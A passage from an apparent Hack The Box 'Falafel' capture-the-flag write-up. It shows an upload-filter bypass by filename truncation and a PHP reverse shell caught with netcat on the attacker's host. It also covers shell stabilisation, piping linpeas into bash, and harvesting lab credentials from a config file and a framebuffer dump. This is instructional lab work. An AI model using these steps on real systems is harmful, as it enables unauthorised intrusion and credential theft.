+ → file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif: GIF image data 28745 x 29552
+
+
+
+Now that we gave it the magic bytes and some junk data, file considers that file as a GIF image with data being 28745 x 29552.
+
+ 
+
+So here we do CTRL+U to view sourcecode and we're going to check what happened to our file:
+
+
+
+And here we see what's happening, the server didn't like our filename being that long, so it shortened it to the following string:
+
+
+ The name is too long, 255 chars total.
+ Trying to shorten...
+ New name is Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah.
+ --2020-12-21 15:59:18-- http://10.10.14.6:9090/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.gif
+ Connecting to 10.10.14.6:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 24 [image/gif]
+ Saving to: 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah'
+
+ 0K 100% 3.78M=0s
+
+ 2020-12-21 15:59:18 (3.78 MB/s) - 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah' saved [24/24]
+
+
+
+Here we can see that the server shortened our 255 char long filename to a 236 char long filename.
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → echo -n 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah' | wc -c
+
+ 236
+
+
+
+Therefore since we know that the server will only acccept gif files, AND that once the file is uploaded it will get shortened to 236 characters, we're going to create a filename that is 232 chars long , make it end in .php so that the filename with the php extension is 236 chars long, and since the server will only accept image files, we're going to make it end in .gif, so let's do that with python:
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A")'
+ A
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232)'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232,".php")'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .php
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232,".php",".gif")'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA .php .gif
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → python3 -c 'print("A"*232,".php",".gif",sep="")'
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+
+
+And there you have it! now create the file, and add in a reverse php shell payload:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → touch $(python3 -c 'print("A"*232,".php",".gif",sep="")')
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → l
+ total 88K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 15:10 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 0 Dec 21 15:10 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → vim AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+
+
+
+
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → l
+ total 88K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 15:16 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 76 Dec 21 15:16 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+ [ 10.10.14.6/23 ] [ /dev/pts/26 ] [~/_HTB/Falafel]
+ → file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif: PHP script, ASCII text
+
+
+
+And we have our file, but as you can see it detects it as php file, but it doesn't matter since the server only cares about the .gif extension. so let's upload it:
+
+
+
+Doing CTRL+U we see that it saved the file correctly as .php:
+
+
+ The name is too long, 240 chars total.
+ Trying to shorten...
+ New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
+ --2020-12-21 16:18:12-- http://10.10.14.6:9090/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ Connecting to 10.10.14.6:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 76 [image/gif]
+ Saving to: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php'
+
+ 0K 100% 11.5M=0s
+
+ 2020-12-21 16:18:12 (11.5 MB/s) - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php' saved [76/76]
+
+
+
+And now from here, we're going to curl the to the url where our file is and get a reverse shell on port 9003:
+
+_Terminal 1:_
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → curl http://10.10.10.73/uploads/1221-1618_a5410da1317c2102/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php
+
+
+
+` _Terminal 2_
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → nc -lvnp 9003
+ listening on [any] 9003 ...
+ **connect to [10.10.14.6] from (UNKNOWN) [10.10.10.73] 52856**
+ bash: cannot set terminal process group (1238): Inappropriate ioctl for device
+ bash: no job control in this shell
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ id
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ ls /home
+ ls /home
+ moshe
+ yossi
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$
+
+
+
+Now before moving on, we're going to upgrade our shell to a fully interactive shell since python3 is available on this box:
+
+
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ cd ~
+ cd ~
+
+ www-data@falafel:/var/www$ which python3
+ which python3
+ /usr/bin/python3
+
+ www-data@falafel:/var/www$ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+
+ www-data@falafel:/var/www$
+
+
+
+once that's done, we're going to get tab autocomplete, to do so hit CTRL+Z to background the shell:
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ ^Z
+ stty raw -echo
+ fg
+
+
+
+As you can see here, this no longer works because on kali 2020.4 the default shell no longer is bash , but now is zsh.
+
+
+
+as shown above, this is the old method for bash and not for zsh, therefore to get a fully-interactive shell on zsh do the following:
+
+
+ python3 -c 'import pty;pty.spawn("/bin/bash")'
+ ^Z
+ stty raw -echo ;fg
+
+
+
+
+
+So as you can see, that's the new method, but you also want to be able to clear the screen, therefore you will need to set the TERM environment variable:
+
+
+
+
+ reset
+ export SHELL=bash
+ export TERM=screen-256color
+ stty rows 50 columns 141
+
+
+
+` 
+
+And now we finally got our fully interactive reverse shell. From here we're going to use an improved version of LinEnum.sh to check for privesc paths, it's called LinPEAS, you can find it on github [here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS):
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/Tools]
+ → cd ~/Tools/
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/Tools]
+ → git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/ linpeas
+ Cloning into 'linpeas'...
+ remote: Enumerating objects: 22, done.
+ remote: Counting objects: 100% (22/22), done.
+ remote: Compressing objects: 100% (15/15), done.
+ remote: Total 3036 (delta 11), reused 14 (delta 7), pack-reused 3014
+ Receiving objects: 100% (3036/3036), 14.38 MiB | 2.29 MiB/s, done.
+ Resolving deltas: 100% (1749/1749), done.
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/Tools]
+ → cd ~/_HTB/Falafel
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → sudo updatedb
+ [sudo] password for nothing:
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → locate linpeas.sh
+ /home/nothing/Tools/linpeas/linPEAS/linpeas.sh
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → cp $(locate linpeas.sh) .
+
+ [ 10.10.14.6/23 ] [ /dev/pts/30 ] [~/_HTB/Falafel]
+ → l
+ total 392K
+ drwxr-xr-x 2 nothing nothing 4.0K Dec 21 15:57 .
+ drwxr-xr-x 4 nothing nothing 4.0K Dec 21 11:44 ..
+ -rw-r--r-- 1 nothing nothing 76 Dec 21 15:16 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+ -rwxr-xr-x 1 nothing nothing 302K Dec 21 15:57 linpeas.sh
+ -rw-r--r-- 1 nothing nothing 541 Dec 21 13:54 login.req
+ -rw-r--r-- 1 nothing nothing 70K Dec 21 13:14 names.txt
+
+
+
+Now that we got our linpeas.sh let's get it onto the box:
+
+
+ www-data@falafel:/var/www/html/uploads/1221-1618_a5410da1317c2102$ which wget && which curl
+ /usr/bin/wget
+ /usr/bin/curl
+
+
+
+We can use both wget or curl to get it on the box, but for now we're going to use curl and pipe it into bash:
+
+
+
+Here, linpeas is going to find EVERYTHING for us, therefore i'm going to put the full results [here](prg/9/linpeas.html):
+
+Basically, linpeas found a few interesting things for us:
+
+
+
+That's the unintended way of doing the box, you just grab whatever CVEs linenum.sh/linpeas.sh report to you and try them one by one. The intended way of doing this box is to poke around the web service and find moshe's password that was in the connection.php file:
+
+
+ www-data@falafel:/var/www/html/uploads/1221-1520_fcb5b2f30c7007fd$ cd ../..
+ www-data@falafel:/var/www/html$ ls
+ assets connection.php cyberlaw.txt header.php images js login_logic.php profile.php style.php uploads
+ authorized.php css footer.php icon.png index.php login.php logout.php robots.txt upload.php
+ www-data@falafel:/var/www/html$ cat connection.php
+ <****?php
+ define('DB_SERVER', 'localhost:3306');**define('DB_USERNAME', 'moshe');
+ define('DB_PASSWORD', 'falafelIsReallyTasty');**
+ define('DB_DATABASE', 'falafel');
+ $db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
+ // Check connection
+ if (mysqli_connect_errno())
+ {
+ echo "Failed to connect to MySQL: " . mysqli_connect_error();
+ }
+ ?>
+
+
+
+And there we have it, we have credentials: **moshe:falafelIsReallyTasty** now instead of su as moshe we're going to login via ssh as the moshe user :
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
+ → ssh moshe@10.10.10.73
+ The authenticity of host '10.10.10.73 (10.10.10.73)' can't be established.
+ ECDSA key fingerprint is SHA256:XPYifpo9zwt53hU1RwUWqFvOB3TlCtyA1PfM9frNWSw.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.73' (ECDSA) to the list of known hosts.
+ moshe@10.10.10.73's password:
+ Permission denied, please try again.
+ moshe@10.10.10.73's password:
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Mon Feb 5 23:35:10 2018 from 10.10.14.2
+ $ bash
+ setterm: terminal screen-256color does not support --blank
+ moshe@falafel:~$ id
+ uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
+ moshe@falafel:~$ ls
+ user.txt
+ moshe@falafel:~$ cat user.txt
+ c8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there we have it! we got the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root user, we need to take a look at the video group:
+
+
+ moshe@falafel:~$ w
+ 17:35:08 up 4:55, 2 users, load average: 0.00, 0.00, 0.00
+ USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
+ yossi tty1 12:39 4:55m 0.06s 0.05s -bash
+ moshe pts/2 10.10.14.6 17:31 0.00s 0.02s 0.00s w
+
+ moshe@falafel:~$ id
+ uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
+
+
+
+Here we are hinted toward something: first of all the user yossi is logged in from tty1, which could mean that he is logged in physically to the machine, next is that we are part of the video group, therefore we could try to dump whatever is on yossi's screen:
+
+
+ moshe@falafel:~$ ls /dev/ -lash | grep fb
+ 0 crw-rw---- 1 root video 29, 0 Dec 21 12:39 fb0
+
+
+
+` 
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → file fb.raw
+ fb.raw: Targa image data - Map (256-257) 257 x 1 x 1 +257 +1 - 1-bit alpha "\001"
+
+
+
+Then to view it we're going to use gimp:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → sudo apt install gimp -y
+
+ [ 10.10.14.6/23 ] [ /dev/pts/0 ] [~/_HTB/Falafel]
+ → gimp
+
+
+`  
+
+However here you can see that we get some garbage, it cannot display what we want and that is because it does not have the correct size, so we're going to enumerate it further to get it's size from moshe's ssh connection:
+
+
+ moshe@falafel:/sys$ find . | grep fb0
+ find: ‘./fs/fuse/connections/40’: Permission denied
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/dev
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/pan
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/name
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/mode
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/console
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/blank
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/modes
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/control
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/async
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_enabled
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_active_kids
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_active_time
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/autosuspend_delay_ms
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_status
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_usage
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/power/runtime_suspended_time
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/state
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/bl_curve
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/bits_per_pixel
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/device
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/cursor
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/subsystem
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/rotate
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/stride
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/uevent
+ ./devices/pci0000:00/0000:00:0f.0/graphics/fb0/virtual_size
+ ./class/graphics/fb0
+ find: ‘./kernel/debug’: Permission denied
+
+ moshe@falafel:/sys$ ls -lash class/graphics/fb0
+ 0 lrwxrwxrwx 1 root root 0 Dec 21 12:39 class/graphics/fb0 -> ../../devices/pci0000:00/0000:00:0f.0/graphics/fb0
+
+
+And here we see that class/graphics/fb0 is a symlink to ../../devices/pci0000:00/0000:00:0f.0/graphics/fb0 so let's go there and see what's in it:
+
+
+ moshe@falafel:/sys$ cd devices/pci0000:00/0000:00:0f.0/graphics/fb0
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ ls -lash
+ total 0
+ 0 drwxr-xr-x 3 root root 0 Dec 21 12:39 .
+ 0 drwxr-xr-x 3 root root 0 Dec 21 12:39 ..
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 bits_per_pixel
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 blank
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 bl_curve
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 console
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 cursor
+ 0 -r--r--r-- 1 root root 4.0K Dec 21 17:06 dev
+ 0 lrwxrwxrwx 1 root root 0 Dec 21 17:06 device -> ../../../0000:00:0f.0
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 mode
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 modes
+ 0 -r--r--r-- 1 root root 4.0K Dec 21 17:06 name
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 pan
+ 0 drwxr-xr-x 2 root root 0 Dec 21 17:01 power
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 rotate
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 state
+ 0 -r--r--r-- 1 root root 4.0K Dec 21 17:06 stride
+ 0 lrwxrwxrwx 1 root root 0 Dec 21 12:39 subsystem -> ../../../../../class/graphics
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 uevent
+ 0 -rw-r--r-- 1 root root 4.0K Dec 21 17:06 virtual_size
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ cat virtual_size
+ 1176,885
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$
+
+
+
+And there we have it, we have the size of the raw image file we needed, so it's 1176 x 885:
+
+ 
+
+We still see some garbage but we just need to pick the RGB565 option and then we see:
+
+
+
+And we have it! we got the following credentials: **yossi:MoshePlzStopHackingMe!** with these credentials, we're going to login as yassi:
+
+
+ moshe@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ su yossi -
+ Password:
+ bash: cannot set terminal process group (-1): Inappropriate ioctl for device
+ bash: no job control in this shell
+ yossi@falafel:/sys/devices/pci0000:00/0000:00:0f.0/graphics/fb0$ cd ~
+
+ yossi@falafel:~$ pwd
+ /home/yossi
+
+ yossi@falafel:~$ ls -lash
+ total 24K
+ 4.0K drwx------ 3 yossi yossi 4.0K Jan 14 2018 .
+ 4.0K drwxr-xr-x 4 root root 4.0K Nov 27 2017 ..
+ 0 -rw------- 1 root root 0 Jan 14 2018 .bash_history
+ 4.0K -rw-r--r-- 1 yossi yossi 220 Nov 27 2017 .bash_logout
+ 4.0K -rw-r--r-- 1 yossi yossi 3.7K Nov 27 2017 .bashrc
+ 4.0K drwx------ 2 yossi yossi 4.0K Nov 27 2017 .cache
+ 4.0K -rw-r--r-- 1 yossi yossi 655 Nov 27 2017 .profile
+
+
+
+And from here we can see that we have been able to login as the user yossi via the su command, but we can also do it via ssh:
+
+
+ [ 10.10.14.6/23 ] [ /dev/pts/29 ] [~/_HTB/Falafel]
